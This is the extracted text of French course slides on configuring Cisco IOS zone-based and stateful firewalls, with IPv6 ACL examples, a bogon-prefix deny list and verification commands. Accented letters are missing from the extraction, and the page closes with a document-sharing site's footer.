(class-maps) le trafic doit tre configure entre deux zones.
La self zone est une exception ce refus implicite de tout. Tout le trafic
vers nimporte quelle interface du routeur est autoris jusquau moment o
il est implicitement refus.
Les actions Pass, Inspect et Drop ne peuvent tre applique quentre des
interfaces appartenant des zones distinctes.
Les interfaces qui ne participent pas ZPF fonctionnent comme des ports
classiques et peuvent utiliser une configuration SPI/CBAC.
Inspect
Configures Cisco IOS SPI (equivalent to ip inspect command).
It automatically allows for return traffic and potential ICMP messages.
For protocols requiring multiple parallel signaling and data sessions (for example,
FTP or H.323), the inspect action also handles the proper establishment of data
sessions.
Pass
Analogous to a permit statement in an ACL.
It does not track the state of connections or sessions within the traffic.
Pass allows the traffic only in one direction.
A corresponding policy must be applied to allow return traffic to pass in the opposite
direction.
Drop
Analogous to a deny statement in an ACL.
A log option is available to log the rejected packets.
3 Actions de ZPF
Cisco Policy Language (CPL)
Configuration
1. Dfinir des class-maps (rgles) qui dcrivent le trafic que
la politique de scurit va vrifier (action) travers un
zone-pair.
2. Dfinir les policy-maps qui dfinissent les politiques de
scurits (comprenant des class-maps)
3. Definir les zones.
4. Assigner les interfaces aux zones.
5. Definir les zone-pairs.
6. Appliquer les policy-maps aux zone-pairs.
Pare-feu 1 : LAN - Internet
Cette configuration en quatre tapes met en place le par-
feu SPI qui vrifie le trafic HTTP, HTTPS, DNS et ICMP
destination de lInternet.
1. Class-maps
2. Policy-map
3. Zones et interfaces
4. Zone-pair
Class-maps
Les Class-maps dcrivent le trafic qui est
permis entre les zones (selon la politique de
scurit) :
conf t
class-map type inspect match-any internet-traffic-class
match protocol http
match protocol https
match protocol dns
match protocol icmp
Policy-map
Un Policy-map, politique de scurit, reprend l
ensemble de vos critres de filtrage (Class-
maps) :
conf t
policy-map type inspect lan-internet-policy
class type inspect internet-traffic-class
inspect
Zones et interfaces
Configuration des zones et assignation des
interfaces :
conf t
zone security lan
zone security internet
interface f0/0
zone-member security lan
interface f0/1
zone-member security internet
Zone-pair
Configuration du lien zone-pair et application
de la policy-map approprie :
conf t
zone-pair security lan-internet source lan destination
internet
service-policy type inspect lan-internet-policy
Vrification
show policy-map type insp zone-pair
show zone security lan
show zone-pair security
Exercice
Mise en place dune politique de filtrage du
LAN la DMZ.
Mise en place dune politique de filtrage de l
Internet la DMZ.
Rfrences
http://www.cisco.
com/c/en/us/support/docs/security/ios-
firewall/98628-zone-design-guide.html
http://www.cisco.
com/c/en/us/support/docs/security/ios-
firewall/109479-zbf-vpn-traffic.html
Objectifs
Sinformer sur le march et les gnralits
Configurer, diagnostiquer et prouver :
ACL : filtrage sans tat
IPv6 IOS Firewall : SPI + ACL
IPv6 Zone-Based Firewall (ZBF)
Filtrages IPv6
Prfixes bogon
En-ttes et extension den-tte
Filtrage des tunnels (6in4, GRE, IPSEC, )
Firewall L2
Logs et performances
Dans les diapositives suivantes :
1. ACL : filtrage sans tat
2. IPv6 IOS Firewall : SPI + ACL
3. IPv6 Zone-Based Firewall (ZBF)
Cisco IPv6 ACLs
Les ACLs IPv6 sont trs similaires aux ACLs IPv4. Il ny a plus que des ACLs
nommes tendues.
(config)#ipv6 access-list name
permit/deny protocol {source-ipv6-prefix/prefix-length |
any | host source-ipv6-address | auth} [operator [port-
number]] {destination-ipv6-prefix/prefix-length | any |
host destination-ipv6-address | auth} [operator [port-
number]] [dest-option-type[doh-number | doh-type]] [dscp
value] [flow-label value] [fragments] [log] [log-input]
[mobility] [mobility-type [mh-number | mh-type]] [reflect
name [timeout value]] [routing] [routing-type routing-
number] [sequence value] [time-range name]
Les ACLs IPv6 sont appliques sur les interfaces en utilisant la commande
ipv6 traffic-filter access-list-name {in | out}.
Entres implicites ACLs
All IPv6 ACLs contain 2 implicit permit statements to allow IPv6
neighbor discovery packets to be sent and received.
permit icmp any any nd-na
permit icmp any any nd-ns
Like IPv4 ACLs, all IPv6 ACLs include an implicit deny as the
last statement.
deny ipv6 any any
These statements will not display in the configuration output. A
best practice is to manually enter all 3 implicit commands.
Manually entering the implicit deny statement will also allow you to log
denied packets without affecting neighbor discovery.
Exemple ACL
Exemple refuser tout trafic TCP80 pour une
adresse en dehors du LAN :
interface f0/0
description interface LAN
ipv6 traffic-filter BLOCK_HOST_01 in
!
ipv6 access-list BLOCK_HOST_01
sequence 20 deny tcp host 2001:DB8:1ab::1 any eq www
Trafic bloquer
unspecified address::
loopback address ::1
IPv4-compatible addresses ::/96
IPv4-mapped addresses (obsolete) ::ffff:0.0.0.0/96, ::/8
automatically tunneled packets using compatible addresses (deprecated RFC 4291)
::0.0.0.0/96
other compatible addresses ::224.0.0.0/100, ::127.0.0.0/104, ::0.0.0.0/104, ::
255.0.0.0/104
false 6to4 packets 2002:e000::/20, 2002:7f00::/24, 2002:0000::/24, 2002:ff00::
/24, 2002:0a00::/24, 2002:ac10::/28, 2002:c0a8::/32
link-local addresses (see specific section about ICMP) fe80::/10
site-local addresses (deprecated) fec0::/10
unique-local packets fc00::/7
multicast packets (only as a source address) ff00::/8
documentation address 2001:db8::/32
6Bone addresses (deprecated) 3ffe::/16
Messages ND autoriser
Messages ND autoriser :
IPv6 multicast packets (MAC addresses 3333.0000.0000 to 3333.FFFF.FFFF) and
have a solid multicast state table
Permit Neighbor Advertisement (NA), Neighbor Solicitation (NS) messages, and
Duplicate Address Detection (DAD) packets
Permit Router Advertisement (RA) messages and Router Solicitation (RS)
messages for SLAAC
Exemple dACL bloquante
ipv6 access-list Internet-Inbound
remark Deny loopback address
deny ipv6 ::1/128 any
remark Deny IPv4-compatible addresses
deny ipv6 0::/96 any
remark Deny IPv4-mapped addresses (obsolete)
deny ipv6 ::ffff:0.0.0.0/96 any
remark Deny auto tunneled packets w/compatible addresses (RFC 4291)
deny ipv6 ::0.0.0.0/96 any
remark Deny other compatible addresses
deny ipv6 ::224.0.0.0/100 any log
deny ipv6 ::127.0.0.0/104 any log
deny ipv6 ::0.0.0.0/104 any log
deny ipv6 ::255.0.0.0/104 any log
remark Deny false 6to4 packets
deny ipv6 2002:e000::/20 any log
deny ipv6 2002:7f00::/24 any log
deny ipv6 2002:0000::/24 any log
deny ipv6 2002:ff00::/24 any log

Exemple dACL bloquante (c.)
deny ipv6 2002:0a00::/24 any log
deny ipv6 2002:ac10::/28 any log
deny ipv6 2002:c0a8::/32 any log
remark Permit good NDP messages since we deny and log at the end
permit icmp fe80::/10 any nd-na
permit icmp fe80::/10 any nd-ns
remark Deny Link-Local communications
deny ipv6 fe80::/10 any
remark Deny Site-Local (deprecated)
deny ipv6 fec0::/10 any
remark Deny Unique-Local packets
deny ipv6 fc00::/7 any
remark Deny multicast packets
deny ipv6 ff00::/8 any
remark Deny Documentation Address
deny ipv6 2001:db8::/32 any
remark Deny 6Bone addresses (deprecated)
deny ipv6 3ffe::/16 any
remark Deny RH0 packets
deny ipv6 any any routing-type 0 log

remark Deny our own addresses coming inbound
deny ipv6 2001:db8:11::/48 any log
remark permit BGP to and from our EBGP neighbor
permit tcp host 2001:db8:4::1 host 2001:db8:4::2 eq bgp
permit tcp host 2001:db8:4::1 eq bgp host 2001:db8:4::2
remark Permit traffic to our web server
permit tcp any host 2001:db8:11::100 eq www
remark Permit our returned traffic from internal clients
permit tcp any 2001:db8:11::/48 range 1024 65535
permit udp any 2001:db8:11::/48 range 1024 65535
remark Permit inbound DNS responses to our internal caching DNS server
permit udp any eq domain host 2001:db8:11:30:20c:29ff:fe5d:982a
remark Permit good ICMPv6 message types
permit icmp any 2001:db8:11::/48 destination-unreachable
permit icmp any 2001:db8:11::/48 packet-too-big
permit icmp any 2001:db8:11::/48 parameter-problem
permit icmp any 2001:db8:11::/48 echo-reply
remark Permit our ISP to ping our external interface
permit icmp host 2001:db8:4::1 host 2001:db8:4::2 echo-request
remark Deny everything else and log it
deny ipv6 any any log
Firewall CBAC standard
Firewall Cisco IOS SPI et ACL. En 6 tapes :
1. Vrifier la connectivit et le routage
2. Configuration globale
3. Configuration des interfaces
4. Configuration des ACLs
5. Tester de lextrieur et de lintrieur
6. Ouvrez du trafic
Paramtres globaux
! paramtres globaux
enable
configure terminal
ipv6 unicast-routing
ipv6 inspect name ipv6_test icmp timeout 60
ipv6 inspect name ipv6_test tcp timeout 60
ipv6 inspect name ipv6_test udp timeout 60
Configuration des interfaces
description LAN (TRUST)
ipv6 enable
ipv6 traffic-filter INBOUND out
ipv6 inspect ipv6_test in
!
description WAN (UNTRUST)
ipv6 enable
ipv6 traffic-filter OUTBOUND in
ACLs bloquantes
ipv6 access-list INBOUND
!
ipv6 access-list OUTBOUND
1. Create the Zones for the firewall.
zone security
2. Define Traffic Classes.
- class-map type inspect
3. Specify Firewall Policies.
- policy-map type inspect
4. Apply Firewall Policies to pairs of source and destination
zones.
- zone-pair
5. Assign Router Interfaces to zones.
- zone-member security
Configuring ZPF
Exemple de configuration ZBF
https://supportforums.cisco.com/docs/DOC-28403
The below topology brings a simple network containing two security zones. Host H1 (Client) and H2
(Admin) are connected to inside interface Gigabit Ethernet 0/1 accessing web server connected to
outside interface Gigabit Ethernet 0/0.
We will have the goal of allowing
1. Only HTTP and HTTPS traffic for H1 (Client) from the inside to the outside
2. HTTP, HTTPS and ICMP for H2 (Admin) from the inside to the outside
All other traffic should drop from inside to outside.
Cration du firewall
parameter-map type inspect v6-param-map
sessions maximum 10000
ipv6 routing-header-enforcement loose
!
class-map type inspect match-any v6-class
match protocol tcp
match protocol udp
match protocol icmp
match protocol ftp
!
policy-map type inspect v6-policy
class type inspect v6-class
inspect
!
zone security z1
zone security z2
!
zone-pair security zp source z1 destination z2
service-policy type inspect v6-policy
Configuration des interfaces
description LAN (TRUST)
ipv6 enable
zone-member z1
!
description WAN (UNTRUST)
ipv6 enable
zone-member z2
Diagnostic fondamental
Sous Cisco IOS :
show ipv6 access-list [access-list-name]
show ipv6 inspect {name inspection-name | config |
interfaces | session [detail] | all}
show logging [slot slot-number | summary]
Pour les preuves :
nmap -6
ping
thc-ipv6 : http://www.si6networks.com/presentations/ipv6kongress/mhfg-
ipv6-kongress-ipv6-security-assessment.pdf
goffinet@goffinet.eu, Introduction aux pare-feu, BY-CC

Pare-Feu Théorie Et Pratique

Încărcat de

Informații document

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

Pare-Feu Théorie Et Pratique

Încărcat de

Drepturi de autor:

Formate disponibile

goffinet@goffinet.

eu, Pare-feu thorie et pratique, CC-BY

S-ar putea să vă placă și